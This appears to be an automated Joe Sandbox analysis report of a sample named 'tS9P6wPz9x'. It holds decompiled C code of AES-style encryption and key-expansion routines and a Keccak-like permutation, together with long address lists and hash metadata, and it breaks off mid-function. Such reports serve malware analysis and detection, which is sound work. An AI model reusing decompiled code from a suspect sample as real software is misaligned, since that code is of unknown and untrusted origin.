                                                                                                                                                            					_t1416 = _t1375;
                                                                                                                                                            					_t1375[0x2c] =  !_v40 & _v24 ^ _t1478;
                                                                                                                                                            					_t1375[0x2d] =  !_t1415 & _v20 ^ _t1374;
                                                                                                                                                            					_t1024[0x2e] =  !_v24 & _v36 ^ _v40;
                                                                                                                                                            					_t1024[0x2f] =  !_v20 & _v32 ^ _t1415;
                                                                                                                                                            					_t1416[0x30] =  !_v36 & _v16 ^ _v24;
                                                                                                                                                            					_t1416[0x31] =  !_v32 & _v28 ^ _v20;
                                                                                                                                                            					_t1299 = _v44;
                                                                                                                                                            					 *_t1416 =  *_t1416 ^  *_t1299;
                                                                                                                                                            					_t693 =  &(_t1299[1]); // 0x0
                                                                                                                                                            					_t969 =  *_t693;
                                                                                                                                                            					_t1300 =  &(_t1299[2]);
                                                                                                                                                            					_t1416[1] = _t1416[1] ^ _t969;
                                                                                                                                                            					_v44 = _t1300;
                                                                                                                                                            				} while (_t1300 < 0x9cfbf8);
                                                                                                                                                            				return _t969;
                                                                                                                                                            			}

                                                                                                                                                            0x009cac3a
                                                                                                                                                            0x009cac3d
                                                                                                                                                            0x009cac40
                                                                                                                                                            0x009cac43
                                                                                                                                                            0x009cac46
                                                                                                                                                            0x009cac4c
                                                                                                                                                            0x009cac4c
                                                                                                                                                            0x009cac52
                                                                                                                                                            0x009cac55
                                                                                                                                                            0x009cac58
                                                                                                                                                            0x009cac5b
                                                                                                                                                            0x009cac5e
                                                                                                                                                            0x009cac64
                                                                                                                                                            0x009cac6a
                                                                                                                                                            0x009cac6d
                                                                                                                                                            0x009cac70
                                                                                                                                                            0x009cac73
                                                                                                                                                            0x009cac76
                                                                                                                                                            0x009cac7c
                                                                                                                                                            0x009cac84
                                                                                                                                                            0x009cac87
                                                                                                                                                            0x009cac93
                                                                                                                                                            0x009cac96
                                                                                                                                                            0x009cac98
                                                                                                                                                            0x009caca0
                                                                                                                                                            0x009caca3
                                                                                                                                                            0x009cacab
                                                                                                                                                            0x009cacb3
                                                                                                                                                            0x009cacb7
                                                                                                                                                            0x009cacc3
                                                                                                                                                            0x009cacc8
                                                                                                                                                            0x009caccf
                                                                                                                                                            0x009cacd4
                                                                                                                                                            0x009cacdc
                                                                                                                                                            0x009cace1
                                                                                                                                                            0x009cace8
                                                                                                                                                            0x009caced
                                                                                                                                                            0x009cacf5
                                                                                                                                                            0x009cacf8
                                                                                                                                                            0x009cacfa
                                                                                                                                                            0x009cacfd
                                                                                                                                                            0x009cad03
                                                                                                                                                            0x009cad0e
                                                                                                                                                            0x009cad14
                                                                                                                                                            0x009cad1c
                                                                                                                                                            0x009cad21
                                                                                                                                                            0x009cad2b
                                                                                                                                                            0x009cad2f
                                                                                                                                                            0x009cad35
                                                                                                                                                            0x009cad3a
                                                                                                                                                            0x009cad43
                                                                                                                                                            0x009cad48
                                                                                                                                                            0x009cad4f
                                                                                                                                                            0x009cad54
                                                                                                                                                            0x009cad5d
                                                                                                                                                            0x009cad62
                                                                                                                                                            0x009cad6c
                                                                                                                                                            0x009cad74
                                                                                                                                                            0x009cad7e
                                                                                                                                                            0x009cad84
                                                                                                                                                            0x009cad8f
                                                                                                                                                            0x009cad95
                                                                                                                                                            0x009cad9b
                                                                                                                                                            0x009cada1
                                                                                                                                                            0x009cada6
                                                                                                                                                            0x009cadb4
                                                                                                                                                            0x009cadb6
                                                                                                                                                            0x009cadbc
                                                                                                                                                            0x009cadc1
                                                                                                                                                            0x009cadca
                                                                                                                                                            0x009cadcf
                                                                                                                                                            0x009cadd6
                                                                                                                                                            0x009caddb
                                                                                                                                                            0x009cade4
                                                                                                                                                            0x009cade9
                                                                                                                                                            0x009cadf0
                                                                                                                                                            0x009cadf5
                                                                                                                                                            0x009cadfe
                                                                                                                                                            0x009cae03
                                                                                                                                                            0x009cae0a
                                                                                                                                                            0x009cae12
                                                                                                                                                            0x009cae1e
                                                                                                                                                            0x009cae24
                                                                                                                                                            0x009cae26
                                                                                                                                                            0x009cae29
                                                                                                                                                            0x009cae2f
                                                                                                                                                            0x009cae35
                                                                                                                                                            0x009cae41
                                                                                                                                                            0x009cae49
                                                                                                                                                            0x009cae5a
                                                                                                                                                            0x009cae5c
                                                                                                                                                            0x009cae5f
                                                                                                                                                            0x009cae61
                                                                                                                                                            0x009cae6d
                                                                                                                                                            0x009cae72
                                                                                                                                                            0x009cae79
                                                                                                                                                            0x009cae81
                                                                                                                                                            0x009cae84
                                                                                                                                                            0x009cae8b
                                                                                                                                                            0x009cae92
                                                                                                                                                            0x009cae97
                                                                                                                                                            0x009cae9f
                                                                                                                                                            0x009caea4
                                                                                                                                                            0x009caeab
                                                                                                                                                            0x009caeb3
                                                                                                                                                            0x009caebe
                                                                                                                                                            0x009caec4
                                                                                                                                                            0x009caec6
                                                                                                                                                            0x009caecc
                                                                                                                                                            0x009caed2
                                                                                                                                                            0x009caedd
                                                                                                                                                            0x009caee3
                                                                                                                                                            0x009caee5
                                                                                                                                                            0x009caeed
                                                                                                                                                            0x009caef2
                                                                                                                                                            0x009caefc
                                                                                                                                                            0x009caf00
                                                                                                                                                            0x009caf04
                                                                                                                                                            0x009caf09
                                                                                                                                                            0x009caf12
                                                                                                                                                            0x009caf17
                                                                                                                                                            0x009caf1a
                                                                                                                                                            0x009caf24
                                                                                                                                                            0x009caf2b
                                                                                                                                                            0x009caf32
                                                                                                                                                            0x009caf37
                                                                                                                                                            0x009caf3f
                                                                                                                                                            0x009caf44
                                                                                                                                                            0x009caf4b
                                                                                                                                                            0x009caf56
                                                                                                                                                            0x009caf5c
                                                                                                                                                            0x009caf64
                                                                                                                                                            0x009caf66
                                                                                                                                                            0x009caf6c
                                                                                                                                                            0x009caf72
                                                                                                                                                            0x009caf7d
                                                                                                                                                            0x009caf83
                                                                                                                                                            0x009caf89
                                                                                                                                                            0x009caf89
                                                                                                                                                            0x009caf8c
                                                                                                                                                            0x009caf8c
                                                                                                                                                            0x009caf8f
                                                                                                                                                            0x009caf8f
                                                                                                                                                            0x009caf92
                                                                                                                                                            0x009caf92
                                                                                                                                                            0x009cafa6
                                                                                                                                                            0x009cafa9
                                                                                                                                                            0x009cafae
                                                                                                                                                            0x009cafb1
                                                                                                                                                            0x009cafb4
                                                                                                                                                            0x009cafb4
                                                                                                                                                            0x009cafbe
                                                                                                                                                            0x009cafc8
                                                                                                                                                            0x009cafcd
                                                                                                                                                            0x009cafd2
                                                                                                                                                            0x009cafd2
                                                                                                                                                            0x009cafd7
                                                                                                                                                            0x009cafd7
                                                                                                                                                            0x009cafda
                                                                                                                                                            0x009cafe9
                                                                                                                                                            0x009cafee
                                                                                                                                                            0x009caff3
                                                                                                                                                            0x009caff8
                                                                                                                                                            0x009caff8
                                                                                                                                                            0x009caffe
                                                                                                                                                            0x009caffe
                                                                                                                                                            0x009cb010
                                                                                                                                                            0x009cb015
                                                                                                                                                            0x009cb4ad
                                                                                                                                                            0x009cb4b0
                                                                                                                                                            0x009cb4b0
                                                                                                                                                            0x009cb4b3
                                                                                                                                                            0x009cb4b6
                                                                                                                                                            0x009cb4b9
                                                                                                                                                            0x009cb4c0
                                                                                                                                                            0x009cb4c6
                                                                                                                                                            0x009cb4c9
                                                                                                                                                            0x009cb4cc
                                                                                                                                                            0x009cb4d2
                                                                                                                                                            0x009cb4d5
                                                                                                                                                            0x009cb4da
                                                                                                                                                            0x009cb4e7
                                                                                                                                                            0x009cb4fd
                                                                                                                                                            0x009cb502
                                                                                                                                                            0x009cb516
                                                                                                                                                            0x009cb51a
                                                                                                                                                            0x009cb520
                                                                                                                                                            0x009cb535
                                                                                                                                                            0x009cb537
                                                                                                                                                            0x009cb53a
                                                                                                                                                            0x009cb553
                                                                                                                                                            0x009cb556
                                                                                                                                                            0x009cb559
                                                                                                                                                            0x009cb55c
                                                                                                                                                            0x009cb55c
                                                                                                                                                            0x009cb562
                                                                                                                                                            0x009cb568
                                                                                                                                                            0x009cb568
                                                                                                                                                            0x009cb56e
                                                                                                                                                            0x009cb56e
                                                                                                                                                            0x009cb574
                                                                                                                                                            0x009cb577
                                                                                                                                                            0x009cb57a
                                                                                                                                                            0x009cb57d
                                                                                                                                                            0x009cb583
                                                                                                                                                            0x009cb583
                                                                                                                                                            0x009cb589
                                                                                                                                                            0x009cb58c
                                                                                                                                                            0x009cb58f
                                                                                                                                                            0x009cb596
                                                                                                                                                            0x009cb59c
                                                                                                                                                            0x009cb5a2
                                                                                                                                                            0x009cb5a5
                                                                                                                                                            0x009cb5ab
                                                                                                                                                            0x009cb5b1
                                                                                                                                                            0x009cb5b6
                                                                                                                                                            0x009cb5c3
                                                                                                                                                            0x009cb5d9
                                                                                                                                                            0x009cb5e1
                                                                                                                                                            0x009cb5fa
                                                                                                                                                            0x009cb5fc
                                                                                                                                                            0x009cb605
                                                                                                                                                            0x009cb61d
                                                                                                                                                            0x009cb61f
                                                                                                                                                            0x009cb628
                                                                                                                                                            0x009cb639
                                                                                                                                                            0x009cb647
                                                                                                                                                            0x009cb64d
                                                                                                                                                            0x009cb653
                                                                                                                                                            0x009cb653
                                                                                                                                                            0x009cb659
                                                                                                                                                            0x009cb659
                                                                                                                                                            0x009cb65f
                                                                                                                                                            0x009cb665
                                                                                                                                                            0x009cb668
                                                                                                                                                            0x009cb66e
                                                                                                                                                            0x009cb66e
                                                                                                                                                            0x009cb674
                                                                                                                                                            0x009cb677
                                                                                                                                                            0x009cb67d
                                                                                                                                                            0x009cb67d
                                                                                                                                                            0x009cb683
                                                                                                                                                            0x009cb686
                                                                                                                                                            0x009cb689
                                                                                                                                                            0x009cb690
                                                                                                                                                            0x009cb696
                                                                                                                                                            0x009cb69c
                                                                                                                                                            0x009cb69f
                                                                                                                                                            0x009cb6a5
                                                                                                                                                            0x009cb6ab
                                                                                                                                                            0x009cb6b3
                                                                                                                                                            0x009cb6c0
                                                                                                                                                            0x009cb6d9
                                                                                                                                                            0x009cb6e1
                                                                                                                                                            0x009cb6fa
                                                                                                                                                            0x009cb6fc
                                                                                                                                                            0x009cb6fe
                                                                                                                                                            0x009cb707
                                                                                                                                                            0x009cb71f
                                                                                                                                                            0x009cb728
                                                                                                                                                            0x009cb741
                                                                                                                                                            0x009cb747
                                                                                                                                                            0x009cb74d
                                                                                                                                                            0x009cb752
                                                                                                                                                            0x009cb754
                                                                                                                                                            0x009cb754
                                                                                                                                                            0x009cb757
                                                                                                                                                            0x009cb75a
                                                                                                                                                            0x009cb75d
                                                                                                                                                            0x009cb760
                                                                                                                                                            0x009cb772

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 83d39c13c2efd6fec92aefe132950f5b0b9b891d7582c5b88d6445412370009b
                                                                                                                                                            • Instruction ID: cb8c801b20ee12fe81e6e5d8007ab0abe3579318d678e0e885b57dfff60831f4
                                                                                                                                                            • Opcode Fuzzy Hash: 83d39c13c2efd6fec92aefe132950f5b0b9b891d7582c5b88d6445412370009b
                                                                                                                                                            • Instruction Fuzzy Hash: 51A2F475A106198FDB48CF69C491AAAF7F2BF8C300F55856ED85AEB741CB34A841CF90
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                            			E009C865D(void* __eflags, unsigned int _a4, signed int _a8, signed int _a12, signed int* _a16) {
                                                                                                                                                            				unsigned int _v8;
                                                                                                                                                            				unsigned int _v12;
                                                                                                                                                            				unsigned int _v16;
                                                                                                                                                            				unsigned int _v20;
                                                                                                                                                            				signed int _t383;
                                                                                                                                                            				signed char _t388;
                                                                                                                                                            				signed char _t393;
                                                                                                                                                            				unsigned int _t394;
                                                                                                                                                            				signed int* _t396;
                                                                                                                                                            				unsigned int _t413;
                                                                                                                                                            				signed int _t420;
                                                                                                                                                            				unsigned int _t434;
                                                                                                                                                            				unsigned int _t453;
                                                                                                                                                            				unsigned int _t499;
                                                                                                                                                            				unsigned int _t501;
                                                                                                                                                            				unsigned int _t507;
                                                                                                                                                            				signed int* _t509;
                                                                                                                                                            				signed int* _t511;
                                                                                                                                                            				signed int* _t512;
                                                                                                                                                            				signed int _t516;
                                                                                                                                                            				signed int _t517;
                                                                                                                                                            				signed int _t519;
                                                                                                                                                            				void* _t521;
                                                                                                                                                            
                                                                                                                                                            				_t521 = __eflags;
                                                                                                                                                            				_t396 = _a12;
                                                                                                                                                            				asm("rol eax, 0x8");
                                                                                                                                                            				asm("ror edx, 0x8");
                                                                                                                                                            				_t511 = _a4;
                                                                                                                                                            				_a4 = ( *_t396 & 0xff00ff00 |  *_t396 & 0x00ff00ff) ^  *_t511;
                                                                                                                                                            				asm("rol eax, 0x8");
                                                                                                                                                            				asm("ror edx, 0x8");
                                                                                                                                                            				_t6 =  &(_t511[1]); // 0x330475c0
                                                                                                                                                            				asm("rol eax, 0x8");
                                                                                                                                                            				asm("ror ebx, 0x8");
                                                                                                                                                            				_v12 = (_t396[1] & 0xff00ff00 | _t396[1] & 0x00ff00ff) ^  *_t6;
                                                                                                                                                            				_t9 =  &(_t511[2]); // 0x560aebc0
                                                                                                                                                            				_t388 = (_t396[2] & 0xff00ff00 | _t396[2] & 0x00ff00ff) ^  *_t9;
                                                                                                                                                            				asm("rol eax, 0x8");
                                                                                                                                                            				asm("ror edx, 0x8");
                                                                                                                                                            				_t11 =  &(_t511[3]); // 0xffe7e8e8
                                                                                                                                                            				_t499 = (_t396[3] & 0xff00ff00 | _t396[3] & 0x00ff00ff) ^  *_t11;
                                                                                                                                                            				_t21 =  &(_t511[4]); // 0x59c033ff
                                                                                                                                                            				_v16 =  *(0x9cdb10 + (_t388 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9cd710 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9cd310 + (_a4 >> 0x18) * 4) ^  *(0x9cdf10 + (_t499 & 0x000000ff) * 4) ^  *_t21;
                                                                                                                                                            				_t33 =  &(_t511[5]); // 0x8b5e5b40
                                                                                                                                                            				_v8 =  *(0x9cdb10 + (_t499 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9cd710 + (_t388 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9cd310 + (_v12 >> 0x18) * 4) ^  *(0x9cdf10 + (_a4 & 0x000000ff) * 4) ^  *_t33;
                                                                                                                                                            				_a12 =  *(0x9cd710 + (_t499 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9cdb10 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9cd310 + (_t388 >> 0x18) * 4);
                                                                                                                                                            				_t413 = _v12;
                                                                                                                                                            				_t516 = _a12 ^  *(0x9cdf10 + (_t413 & 0x000000ff) * 4);
                                                                                                                                                            				_a12 = _t516;
                                                                                                                                                            				_t48 =  &(_t511[6]); // 0x55c35de5
                                                                                                                                                            				_a12 = _t516 ^  *_t48;
                                                                                                                                                            				_t60 =  &(_t511[7]); // 0xec83ec8b
                                                                                                                                                            				_t420 =  *(0x9cdb10 + (_t413 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9cd710 + (_a4 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9cd310 + (_t499 >> 0x18) * 4) ^  *(0x9cdf10 + (_t388 & 0x000000ff) * 4) ^  *_t60;
                                                                                                                                                            				_t512 =  &(_t511[8]);
                                                                                                                                                            				_a8 = (_a8 >> 1) - 1;
                                                                                                                                                            				while(1) {
                                                                                                                                                            					_a4 = _t420;
                                                                                                                                                            					if(_t521 == 0) {
                                                                                                                                                            						break;
                                                                                                                                                            					}
                                                                                                                                                            					_t517 = _a12;
                                                                                                                                                            					_t501 = _v16;
                                                                                                                                                            					_v12 =  *(0x9cdb10 + (_t517 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9cd710 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9cd310 + (_t501 >> 0x18) * 4) ^  *(0x9cdf10 + (_a4 & 0x000000ff) * 4) ^  *_t512;
                                                                                                                                                            					_t85 =  &(_t512[1]); // 0x5350d045
                                                                                                                                                            					_v20 =  *(0x9cdb10 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9cd710 + (_t517 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9cd310 + (_v8 >> 0x18) * 4) ^  *(0x9cdf10 + (_t501 & 0x000000ff) * 4) ^  *_t85;
                                                                                                                                                            					_t434 = _v8;
                                                                                                                                                            					_t97 =  &(_t512[2]); // 0x176be8
                                                                                                                                                            					_t393 =  *(0x9cd710 + (_a4 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9cdb10 + (_t501 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9cd310 + (_t517 >> 0x18) * 4) ^  *(0x9cdf10 + (_t434 & 0x000000ff) * 4) ^  *_t97;
                                                                                                                                                            					_t107 =  &(_t512[3]); // 0x14c48300
                                                                                                                                                            					_t507 =  *(0x9cdb10 + (_t434 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9cd710 + (_t501 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9cd310 + (_a4 >> 0x18) * 4) ^  *(0x9cdf10 + (_t517 & 0x000000ff) * 4) ^  *_t107;
                                                                                                                                                            					_t118 =  &(_t512[4]); // 0x1374c085
                                                                                                                                                            					_v16 =  *(0x9cdb10 + (_t393 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9cd710 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9cd310 + (_v12 >> 0x18) * 4) ^  *(0x9cdf10 + (_t507 & 0x000000ff) * 4) ^  *_t118;
                                                                                                                                                            					_t130 =  &(_t512[5]); // 0xff0c75ff
                                                                                                                                                            					_v8 =  *(0x9cdb10 + (_t507 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9cd710 + (_t393 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9cd310 + (_v20 >> 0x18) * 4) ^  *(0x9cdf10 + (_v12 & 0x000000ff) * 4) ^  *_t130;
                                                                                                                                                            					_a12 =  *(0x9cd710 + (_t507 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9cdb10 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9cd310 + (_t393 >> 0x18) * 4);
                                                                                                                                                            					_t453 = _v20;
                                                                                                                                                            					_t519 = _a12 ^  *(0x9cdf10 + (_t453 & 0x000000ff) * 4);
                                                                                                                                                            					_a12 = _t519;
                                                                                                                                                            					_t145 =  &(_t512[6]); // 0xe8530875
                                                                                                                                                            					_a12 = _t519 ^  *_t145;
                                                                                                                                                            					_t156 =  &(_t512[7]); // 0x1710
                                                                                                                                                            					_t420 =  *(0x9cdb10 + (_t453 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9cd710 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9cd310 + (_t507 >> 0x18) * 4) ^  *(0x9cdf10 + (_t393 & 0x000000ff) * 4) ^  *_t156;
                                                                                                                                                            					_t512 =  &(_t512[8]);
                                                                                                                                                            					_t157 =  &_a8;
                                                                                                                                                            					 *_t157 = _a8 - 1;
                                                                                                                                                            					__eflags =  *_t157;
                                                                                                                                                            				}
                                                                                                                                                            				_t394 = _v16;
                                                                                                                                                            				_t509 = _a16;
                                                                                                                                                            				asm("rol ecx, 0x8");
                                                                                                                                                            				asm("ror eax, 0x8");
                                                                                                                                                            				 *_t509 = ( *(0x9ce310 + (_v8 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + (_a12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9ce310 + (_t394 >> 0x18) * 4) & 0xff000000 ^  *(0x9ce310 + (_a4 & 0x000000ff) * 4) & 0x000000ff ^  *_t512) & 0xff00ff00 | ( *(0x9ce310 + (_v8 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + (_a12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9ce310 + (_t394 >> 0x18) * 4) & 0xff000000 ^  *(0x9ce310 + (_a4 & 0x000000ff) * 4) & 0x000000ff ^  *_t512) & 0x00ff00ff;
                                                                                                                                                            				_t184 =  &(_t512[1]); // 0x5350d045
                                                                                                                                                            				asm("rol ecx, 0x8");
                                                                                                                                                            				asm("ror eax, 0x8");
                                                                                                                                                            				_t509[1] = ( *(0x9ce310 + (_a12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + (_a4 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9ce310 + (_v8 >> 0x18) * 4) & 0xff000000 ^  *(0x9ce310 + (_t394 & 0x000000ff) * 4) & 0x000000ff ^  *_t184) & 0xff00ff00 | ( *(0x9ce310 + (_a12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + (_a4 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9ce310 + (_v8 >> 0x18) * 4) & 0xff000000 ^  *(0x9ce310 + (_t394 & 0x000000ff) * 4) & 0x000000ff ^  *_t184) & 0x00ff00ff;
                                                                                                                                                            				_t197 =  &(_t512[2]); // 0x176be8
                                                                                                                                                            				asm("ror eax, 0x8");
                                                                                                                                                            				asm("rol ecx, 0x8");
                                                                                                                                                            				_t509[2] = ( *(0x9ce310 + (_a4 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + (_t394 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9ce310 + (_a12 >> 0x18) * 4) & 0xff000000 ^  *(0x9ce310 + (_v8 & 0x000000ff) * 4) & 0x000000ff ^  *_t197) & 0xff00ff00 | ( *(0x9ce310 + (_a4 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + (_t394 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9ce310 + (_a12 >> 0x18) * 4) & 0xff000000 ^  *(0x9ce310 + (_v8 & 0x000000ff) * 4) & 0x000000ff ^  *_t197) & 0x00ff00ff;
                                                                                                                                                            				_t210 =  &(_t512[3]); // 0x14c48300
                                                                                                                                                            				asm("rol ecx, 0x8");
                                                                                                                                                            				asm("ror eax, 0x8");
                                                                                                                                                            				_t383 = ( *(0x9ce310 + (_t394 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + (_v8 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9ce310 + (_a4 >> 0x18) * 4) & 0xff000000 ^  *(0x9ce310 + (_a12 & 0x000000ff) * 4) & 0x000000ff ^  *_t210) & 0xff00ff00 | ( *(0x9ce310 + (_t394 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x9ce310 + (_v8 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x9ce310 + (_a4 >> 0x18) * 4) & 0xff000000 ^  *(0x9ce310 + (_a12 & 0x000000ff) * 4) & 0x000000ff ^  *_t210) & 0x00ff00ff;
                                                                                                                                                            				_t509[3] = _t383;
                                                                                                                                                            				return _t383;
                                                                                                                                                            			}


























                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • Opcode ID: f45a757e62e34622550f62482d82866defcb191e6c1e7684e22934bebfdff9cf
                                                                                                                                                            • Instruction ID: 7c75acd6c3ac910c6adfb3c072a493b9f61248411bc95efee8945c832d159f2e
                                                                                                                                                            • Opcode Fuzzy Hash: f45a757e62e34622550f62482d82866defcb191e6c1e7684e22934bebfdff9cf
                                                                                                                                                            • Instruction Fuzzy Hash: 92E14A71A34159ABCB08CF1DECA1D7A77E0FB49301745492EE542C7396CA39EA21FB90
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 80%
                                                                                                                                                            			E009C8B80(signed int* _a4, signed int* _a8, signed int* _a12) {
                                                                                                                                                            				signed int _t164;
                                                                                                                                                            				signed int _t180;
                                                                                                                                                            				signed int* _t197;
                                                                                                                                                            				signed int _t199;
                                                                                                                                                            				signed int* _t216;
                                                                                                                                                            				signed int _t218;
                                                                                                                                                            				signed int* _t222;
                                                                                                                                                            				void* _t223;
                                                                                                                                                            				signed int _t239;
                                                                                                                                                            				signed int _t259;
                                                                                                                                                            				signed int _t277;
                                                                                                                                                            				signed int _t295;
                                                                                                                                                            				signed int* _t298;
                                                                                                                                                            				signed int _t317;
                                                                                                                                                            				signed int _t320;
                                                                                                                                                            				signed int _t324;
                                                                                                                                                            				signed int _t331;
                                                                                                                                                            				signed int _t333;
                                                                                                                                                            				signed int _t335;
                                                                                                                                                            				signed int _t338;
                                                                                                                                                            				signed int _t345;
                                                                                                                                                            				signed int _t347;
                                                                                                                                                            				signed int _t350;
                                                                                                                                                            				signed int _t354;
                                                                                                                                                            				signed char _t357;
                                                                                                                                                            				signed int _t365;
                                                                                                                                                            				signed int* _t366;
                                                                                                                                                            				signed int _t372;
                                                                                                                                                            				signed int* _t373;
                                                                                                                                                            				signed int* _t374;
                                                                                                                                                            				signed int _t381;
                                                                                                                                                            				signed int _t388;
                                                                                                                                                            				signed int _t395;
                                                                                                                                                            				signed int* _t396;
                                                                                                                                                            				signed int* _t398;
                                                                                                                                                            				signed int* _t399;
                                                                                                                                                            				signed int* _t401;
                                                                                                                                                            				signed int* _t402;
                                                                                                                                                            
                                                                                                                                                            				_t298 = _a8;
                                                                                                                                                            				_t399 = _a4;
                                                                                                                                                            				asm("rol eax, 0x8");
                                                                                                                                                            				asm("ror ecx, 0x8");
                                                                                                                                                            				_t3 =  &(_t399[1]); // 0x9c8148
                                                                                                                                                            				_t396 = _t3;
                                                                                                                                                            				 *_t399 =  *_t298 & 0xff00ff00 |  *_t298 & 0x00ff00ff;
                                                                                                                                                            				asm("ror eax, 0x8");
                                                                                                                                                            				asm("rol ecx, 0x8");
                                                                                                                                                            				 *_t396 = _t298[1] & 0xff00ff00 | _t298[1] & 0x00ff00ff;
                                                                                                                                                            				asm("ror eax, 0x8");
                                                                                                                                                            				asm("rol ecx, 0x8");
                                                                                                                                                            				_t399[2] = _t298[2] & 0xff00ff00 | _t298[2] & 0x00ff00ff;
                                                                                                                                                            				asm("ror edx, 0x8");
                                                                                                                                                            				asm("rol eax, 0x8");
                                                                                                                                                            				_t354 = _t298[3] & 0xff00ff00 | _t298[3] & 0x00ff00ff;
                                                                                                                                                            				_t399[3] = _t354;
                                                                                                                                                            				if(_a12 != 0x80) {
                                                                                                                                                            					asm("ror eax, 0x8");
                                                                                                                                                            					asm("rol ecx, 0x8");
                                                                                                                                                            					_t399[4] = _t298[4] & 0xff00ff00 | _t298[4] & 0x00ff00ff;
                                                                                                                                                            					asm("ror edx, 0x8");
                                                                                                                                                            					asm("rol eax, 0x8");
                                                                                                                                                            					_t357 = _t298[5] & 0xff00ff00 | _t298[5] & 0x00ff00ff;
                                                                                                                                                            					_t399[5] = _t357;
                                                                                                                                                            					if(_a12 != 0xc0) {
                                                                                                                                                            						asm("rol ecx, 0x8");
                                                                                                                                                            						asm("ror eax, 0x8");
                                                                                                                                                            						_t399[6] = _t298[6] & 0xff00ff00 | _t298[6] & 0x00ff00ff;
                                                                                                                                                            						asm("ror eax, 0x8");
                                                                                                                                                            						asm("rol ecx, 0x8");
                                                                                                                                                            						_t164 = _t298[7] & 0xff00ff00 | _t298[7] & 0x00ff00ff;
                                                                                                                                                            						_t399[7] = _t164;
                                                                                                                                                            						if(_a12 != 0x100) {
                                                                                                                                                            							return 0;
                                                                                                                                                            						}
                                                                                                                                                            						_a8 = 0x9cfb14;
                                                                                                                                                            						_t93 =  &(_t399[2]); // 0xc35de58b
